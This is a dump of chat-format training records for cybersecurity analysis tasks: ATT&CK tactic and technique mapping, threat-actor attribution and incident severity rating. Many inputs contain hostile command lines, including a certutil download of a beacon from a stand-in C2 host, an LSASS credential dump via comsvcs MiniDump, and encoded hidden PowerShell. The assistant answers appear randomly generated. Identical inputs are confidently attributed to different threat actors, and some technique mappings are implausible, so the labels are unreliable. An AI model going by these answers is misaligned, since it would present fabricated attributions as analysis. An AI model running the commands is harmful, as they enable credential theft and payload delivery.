messages
listlengths
2
2
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: TLS, JA3 Spoof, Base64", "role": "user" }, { "content": "{\"actor\": \"Mustang Panda\...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: OSX_OCEANLOTUS.D has variants that check a number of system parameters to see if it is being run on real hardware or in a virtual machine environment, such as sysctl hw.model.", "role": "user" }, { "conte...
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: Bad Rabbit has been executed through user installation of an executable disguised as a flash installer.", "role": "user" }, { "content": "{\"tactics\": [\"TA0002\"], \"techniques\": [\"T1204.002\", \"T1204\"]}", "role":...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nEvasion Methods: Base64, LOLBin, JA3 Spoof", "role": "user" }, { "content": "{\"actor\": \"APT29\", \...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 878 C:\\temp\\lsass.dmp full\nEvasion Methods: Base64, WMI, LOLBin", "role": "user" }, { "content": "{\"actor\": \"Lapsus$\", \"confidence...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Administrators may also create forwarding rules for user accounts with the same considerations and outcomes.", "role": "user" }, { "content": "{\"tactics\": [\"TA0009\"], \"techniques\": [\"T1114\", \"T1114.003...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: HKCU\\Software\\Microsoft\\Office test\\Special\\Perf", "role": "user" }, { "content": "{\"tactics\": [\"TA0003\"], \"techniques\": [\"T1137\"]}", "role": "assistant" } ]
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Octopus can collect the host IP address from the victim’s machine.", "role": "user" }, { "content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1016\"]}", "role": "assistant" } ]
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 1490 C:\\temp\\lsass.dmp full\nEvasion Methods: LOLBin, Base64, WMI", "role": "user" }, { "content": "{\"actor\": \"APT29\", \"confidence\...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: cmstp.exe executing: rundll32.exe comsvcs.dll, MiniDump 2444 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.2/TCP connection to 1.8.97.19", "role": "user" }, { "content": "{\"tactics\": [\"TA0009\", \...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (WIN-FIN-SRV-SVDS0JAGUM)\nNetwork Activity: TLSv1.2/TCP to update.microsoft.com\nAttack Tactics: Initial Access, Privilege Escalation, Impact", "role": "us...
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Goopy has the ability to exfiltrate data over the Microsoft Outlook C2 channel.", "role": "user" }, { "content": "{\"tactics\": [\"TA0010\"], \"techniques\": [\"T1041\"]}", "role": "assistant" } ]
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (EC2-INST-55VII89PDM)\nNetwork Activity: TLSv1.2/TCP to github.com\nAttack Tactics: Lateral Movement", "role": "user" }, { "content": "{\"severity\": \"Hi...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: SUNBURST checked for a variety of antivirus/endpoint detection agents prior to execution.", "role": "user" }, { "content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1518.001\", \"T1518\"]}", "r...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: wmic.exe executing: rundll32.exe comsvcs.dll, MiniDump 993 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.2/TCP connection to 1.46.150.69", "role": "user" }, { "content": "{\"tactics\": [\"TA0011\", \...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: mshta.exe executing: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nNetwork: TLSv1.2/TCP connection to 1.81.225.136", "role": "user" }, { "content": "{\"tactics\": [\"TA0004\", \"TA0043\", \"TA0008\"], \"t...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nEvasion Methods: LOLBin, TLS, JA3 Spoof", "role": "user" }, { "content": "{\"actor\": \"APT29\", \"confidence\": \"High...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: cmstp.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.3/TCP connection to 1.192.202.185", "role": "user" }, { "content": "{\"tactics\": [\"TA0008\", \"TA0003\"], \"techniq...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: TLS, JA3 Spoof, LOLBin", "role": "user" }, { "content": "{\"actor\": \"Lapsus$\", \"c...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (AZURE-VM-I7813RFLTR)\nNetwork Activity: HTTP/TCP to github.com\nAttack Tactics: Execution", "role": "user" }, { "content": "{\"severity\": \"High\...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (AZURE-VM-IGCX3CIVR8)\nNetwork Activity: TLSv1.3/TCP to github.com\nAttack Tactics: Privilege Escalation, Collection, Defense Evasion", "role": "user" }, { ...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (EC2-INST-1LQZZFN4HV)\nNetwork Activity: HTTP/TCP to update.microsoft.com\nAttack Tactics: Reconnaissance, Command and Control, Impact", "role": "user" }, {...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: rundll32.exe executing: rundll32.exe comsvcs.dll, MiniDump 796 C:\\temp\\lsass.dmp full\nNetwork: HTTP/TCP connection to 1.187.146.115", "role": "user" }, { "content": "{\"tactics\": [\"TA0008\", \"TA0004\", \"TA0043\"], \"t...
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: Analyze the process execution trees, historical activities from the third-party application (such as what types of files are usually pushed), and the resulting activities or events from the file/binary/script pushed to systems.", "...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (DB-ORACLE-SL1YYU7JLA)\nNetwork Activity: TLSv1.3/TCP to cdn-content.com\nAttack Tactics: Defense Evasion, Lateral Movement", "role": "user" }, { "content":...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Monitor executed commands and arguments that may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key.", "role": "user" }, { "content": "{\"tactics\": [\"T...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: powershell.exe executing: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nNetwork: TLSv1.2/TCP connection to 1.26.43.10", "role": "user" }, { "content": "{\"tactics\": [\"TA0011\", \"TA0004\"], \"techni...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (DB-ORACLE-ZA3PJTILVV)\nNetwork Activity: HTTP/TCP to aws.amazon.com\nAttack Tactics: Reconnaissance, Defense Evasion", "role": "user" }, { "conten...
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: Lizar can run Mimikatz to harvest credentials.", "role": "user" }, { "content": "{\"tactics\": [\"TA0006\"], \"techniques\": [\"T1003\", \"T1003.001\"]}", "role": "assistant" } ]
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: If the dwell time value for the active mode has been set, but the package has not been received, the dwell time value is incremented by the dwell time value for the active period", "role": "user" }, { "content": "{\"tactics...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (IAM-ROLE-8LSQRG7SWA)\nNetwork Activity: TLSv1.3/TCP to update.microsoft.com\nAttack Tactics: Exfiltration, Execution, Credential Access", "role": "user" }, {...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: mshta.exe executing: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nNetwork: HTTP/TCP connection to 1.5.127.95", "role": "user" }, { "content": "{\"tactics\": [\"TA0009\...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: Fileless, LOLBin, WMI", "role": "user" }, { "content": "{\"actor\": \"APT29\", \"conf...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: Fileless, WMI, LOLBin", "role": "user" }, { "content": "{\"actor\": \"APT29\", \"conf...
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: GPO: Computer Configuration > [Policies] > Windows Settings > Security Settings > Local Policies > User Rights Assignment: Create a token object.", "role": "user" }, { "content": "{\"tactics\": [\"TA0004\...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: This time, weaponized lure documents claiming to contain seminar information on environmental protection were observed exploiting known Microsoft Office vulnerabilities CVE-2017-0199 and CVE-2017-11882 to drop and execute ...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Bisonal can retrieve a file listing from the system.", "role": "user" }, { "content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1083\"]}", "role": "assistant" } ]
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Lazarus Group malware TangoDelta attempts to terminate various processes associated with McAfee.", "role": "user" }, { "content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\"T1562.001\", \"T1562\"]}", "...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nEvasion Methods: LOLBin, JA3 Spoof, WMI", "role": "user" }, { "content": "{\"actor\": \"Lapsus$\", \"confid...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Configuration Decryption: Another small, but same important function in the photo above, is the function for decrypting the data containing the C&C configuration", "role": "user" }, { "content": "{\"tact...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: To decrypt the passwords, an adversary needs four components:", "role": "user" }, { "content": "{\"tactics\": [\"TA0003\", \"TA0005\", \"TA0006\"], \"techniques\": [\"T1556\", \"T1556.005\"]}", "role": "ass...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: wmic.exe executing: rundll32.exe comsvcs.dll, MiniDump 1996 C:\\temp\\lsass.dmp full\nNetwork: HTTP/TCP connection to 1.24.99.129", "role": "user" }, { "content": "{\"tactics\": [\"TA0007\"], \"techniques\": ...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 2357 C:\\temp\\lsass.dmp full\nEvasion Methods: JA3 Spoof, Base64, WMI", "role": "user" }, { "content": "{\"actor\": \"Scattered Spider\",...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: JA3 Spoof, TLS, LOLBin", "role": "user" }, { "content": "{\"actor\": \"UNC4841\", \"c...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: rundll32.exe executing: rundll32.exe comsvcs.dll, MiniDump 2010 C:\\temp\\lsass.dmp full\nNetwork: HTTP/TCP connection to 1.124.124.9", "role": "user" }, { "content": "{\"tactics\": [\"TA0007\", \"TA0004\", \...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (WIN-FIN-SRV-UUQ5XM49HM)\nNetwork Activity: TLSv1.3/TCP to aws.amazon.com\nAttack Tactics: Credential Access, Privilege Escalation", "role": "user" }, ...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Hikit supports peer connections.", "role": "user" }, { "content": "{\"tactics\": [\"TA0011\"], \"techniques\": [\"T1090.001\", \"T1090\"]}", "role": "assistant" } ]
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Operation Wocao has used Mimikatz to dump certificates and private keys from the Windows certificate store.", "role": "user" }, { "content": "{\"tactics\": [\"TA0006\"], \"techniques\": [\"T1552.004\", \"T1552\...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (IAM-ROLE-6F7KEXMKDX)\nNetwork Activity: TLSv1.3/TCP to github.com\nAttack Tactics: Exfiltration", "role": "user" }, { "content": "{\"severity\": \...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nEvasion Methods: WMI, TLS, LOLBin", "role": "user" }, { "content": "{\"actor\": \"Mustang Panda\", \"confidence\": \"Hi...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: TLS, WMI, LOLBin", "role": "user" }, { "content": "{\"actor\": \"APT41\", \"confidenc...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: powershell.exe executing: rundll32.exe comsvcs.dll, MiniDump 3735 C:\\temp\\lsass.dmp full\nNetwork: HTTP/TCP connection to 1.113.65.230", "role": "user" }, { "content": "{\"tactics\": [\"TA0002\", \"TA0005\"...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: JA3 Spoof, WMI, Base64", "role": "user" }, { "content": "{\"actor\": \"Mustang Panda\...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: certutil.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.3/TCP connection to 1.95.219.219", "role": "user" }, { "content": "{\"tactics\": [\"TA0011\", \"TA...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 1577 C:\\temp\\lsass.dmp full\nEvasion Methods: Base64, Fileless, TLS", "role": "user" }, { "content": "{\"actor\": \"Mustang Panda\", \"c...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (AZURE-VM-J8JMPCRW0J)\nNetwork Activity: TLSv1.2/TCP to update.microsoft.com\nAttack Tactics: Privilege Escalation", "role": "user" }, { "content": "{\"...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Compare recent invocations of regsvr32.exe with prior history of known good arguments and loaded files to determine anomalous and potentially adversarial activity.", "role": "user" }, { "content": "{\"tac...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: Base64, TLS, WMI", "role": "user" }, { "content": "{\"actor\": \"UNC4841\", \"confide...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 3762 C:\\temp\\lsass.dmp full\nEvasion Methods: Fileless, WMI, LOLBin", "role": "user" }, { "content": "{\"actor\": \"Volt Typhoon\", \"co...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (AZURE-VM-G8NYILZ0J1)\nNetwork Activity: TLSv1.2/TCP to update.microsoft.com\nAttack Tactics: Initial Access, Reconnaissance, Credential Access", "role": "...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 2587 C:\\temp\\lsass.dmp full\nEvasion Methods: JA3 Spoof, LOLBin, Base64", "role": "user" }, { "content": "{\"actor\": \"Scattered Spider...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (DB-ORACLE-RHRQ00ALKX)\nNetwork Activity: TLSv1.3/TCP to aws.amazon.com\nAttack Tactics: Impact, Defense Evasion", "role": "user" }, { "content": "{\"se...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (WIN-FIN-SRV-1K9PJPN9AR)\nNetwork Activity: HTTP/TCP to github.com\nAttack Tactics: Initial Access, Defense Evasion", "role": "user" }, { "content": "{\"s...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities.", "role": "user" }, { "content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\"T15...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: poison name services", "role": "user" }, { "content": "{\"tactics\": [\"TA0006\", \"TA0009\"], \"techniques\": [\"T1557.001\", \"T1557\"]}", "role": "assistant" } ]
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: The setting can be configured through GPO: Computer Configuration > [Policies] > Windows Settings > Security Settings > Local Policies > Security Options: Domain Controller: Allow server operators to schedule tasks, ...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: cmstp.exe executing: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nNetwork: TLSv1.3/TCP connection to 1.15.135.196", "role": "user" }, { "content": "{\"tactics\": [\"TA0007\", \"TA0009\"], \"technique...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: LOLBin, TLS, Fileless", "role": "user" }, { "content": "{\"actor\": \"UNC4841\", \"co...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Adversaries may also directly start services through Service Execution.", "role": "user" }, { "content": "{\"tactics\": [\"TA0003\", \"TA0004\"], \"techniques\": [\"T1543.003\", \"T1543\"]}", "role": ...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: powershell.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.2/TCP connection to 1.87.180.227", "role": "user" }, { "content": "{\"tactics\": [...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (APP-WEB-LDXBCJJF25)\nNetwork Activity: TLSv1.2/TCP to github.com\nAttack Tactics: Collection, Privilege Escalation", "role": "user" }, { "content"...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (APP-WEB-PR9QT1TPXH)\nNetwork Activity: HTTP/TCP to github.com\nAttack Tactics: Discovery, Exfiltration, Privilege Escalation", "role": "user" }, { "con...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Perform physical inspection of hardware to look for potential tampering.", "role": "user" }, { "content": "{\"tactics\": [\"TA0001\"], \"techniques\": [\"T1195\", \"T1195.003\"]}", "role": "assistant" } ]
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (EC2-INST-E2Y1N9IR1H)\nNetwork Activity: TLSv1.2/TCP to github.com\nAttack Tactics: Collection, Reconnaissance", "role": "user" }, { "content": "{\"severity...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: WMI, Fileless, JA3 Spoof", "role": "user" }, { "content": "{\"actor\": \"APT29\", \"c...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: mshta.exe executing: rundll32.exe comsvcs.dll, MiniDump 2882 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.2/TCP connection to 1.188.69.230", "role": "user" }, { "content": "{\"tactics\": [\"TA0003\"], \"techniques\": [\"T1531\"]...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: bitsadmin.exe executing: rundll32.exe comsvcs.dll, MiniDump 3681 C:\\temp\\lsass.dmp full\nNetwork: HTTP/TCP connection to 1.170.144.147", "role": "user" }, { "content": "{\"tactics\": [\"TA0007\", \"TA0009\"...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: certutil.exe executing: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nNetwork: TLSv1.2/TCP connection to 1.55.107.22", "role": "user" }, { "content": "{\"tactics\": [\"TA0002\", \"TA0010\"...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Koadic has used PowerShell to establish persistence.", "role": "user" }, { "content": "{\"tactics\": [\"TA0002\"], \"techniques\": [\"T1059.001\", \"T1059\"]}", "role": "assistant" } ]
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 558 C:\\temp\\lsass.dmp full\nEvasion Methods: JA3 Spoof, WMI, Fileless", "role": "user" }, { "content": "{\"actor\": \"UNC4841\", \"confi...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (AZURE-VM-J6LXC4BRR1)\nNetwork Activity: HTTP/TCP to github.com\nAttack Tactics: Command and Control", "role": "user" }, { "content": "{\"severity\...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (EC2-INST-RGI5PO8KFN)\nNetwork Activity: TLSv1.3/TCP to update.microsoft.com\nAttack Tactics: Exfiltration", "role": "user" }, { "content": "{\"severity...
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: Olympic Destroyer will attempt to clear the System and Security event logs using wevtutil.", "role": "user" }, { "content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\"T1070\", \"T1070.001\"]}", "role": "assistant" ...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: certutil.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: HTTP/TCP connection to 1.126.80.48", "role": "user" }, { "content": "{\"tactics\": [\"TA0001\", \"TA0004\"], \"technique...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (EC2-INST-MRWE3RNH3S)\nNetwork Activity: TLSv1.2/TCP to github.com\nAttack Tactics: Privilege Escalation, Credential Access, Collection", "role": "user" }, { ...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: bitsadmin.exe executing: rundll32.exe comsvcs.dll, MiniDump 832 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.3/TCP connection to 1.179.75.16", "role": "user" }, { "content": "{\"tactics\": [\"TA0043...
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Ramsay has used HTTP for C2.", "role": "user" }, { "content": "{\"tactics\": [\"TA0011\"], \"techniques\": [\"T1071\", \"T1071.001\"]}", "role": "assistant" } ]
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: SideTwist can collect the username on a targeted system.", "role": "user" }, { "content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1033\"]}", "role": "assistant" } ]
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: LOLBin, Fileless, WMI", "role": "user" }, { "content": "{\"actor\": \"APT41\", \"conf...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (AZURE-VM-C7PC0BZMLZ)\nNetwork Activity: TLSv1.3/TCP to update.microsoft.com\nAttack Tactics: Command and Control", "role": "user" }, { "content": ...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nEvasion Methods: LOLBin, WMI, Fileless", "role": "user" }, { "content": "{\"actor\": \"Scattered Spid...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (WIN-FIN-SRV-QD430D1LSF)\nNetwork Activity: TLSv1.2/TCP to aws.amazon.com\nAttack Tactics: Defense Evasion, Command and Control, Exfiltration", "role": "us...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: Fileless, JA3 Spoof, Base64", "role": "user" }, { "content": "{\"actor\": \"Lapsus$\"...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: LOLBin, WMI, Fileless", "role": "user" }, { "content": "{\"actor\": \"FIN7\", \"confi...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (IAM-ROLE-9JDEOQQ3UT)\nNetwork Activity: HTTP/TCP to github.com\nAttack Tactics: Collection", "role": "user" }, { "content": "{\"severity\": \"Crit...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (APP-WEB-Y6CDXWBRUS)\nNetwork Activity: TLSv1.2/TCP to aws.amazon.com\nAttack Tactics: Execution, Exfiltration", "role": "user" }, { "content": "{\"seve...
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Develop and publish policies that define acceptable information to be stored in code repositories.", "role": "user" }, { "content": "{\"tactics\": [\"TA0009\"], \"techniques\": [\"T1213\", \"T1213.003\"]}...
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: nltest /domain_trusts", "role": "user" }, { "content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1482\"]}", "role": "assistant" } ]
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 3901 C:\\temp\\lsass.dmp full\nEvasion Methods: Base64, WMI, JA3 Spoof", "role": "user" }, { "content": "{\"actor\": \"Volt Typhoon\", \"c...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: An adversary who finds a program vulnerable to search order hijacking (, a program that does not specify the path to an executable) may take advantage of this vulnerability by creating a program named after the impro...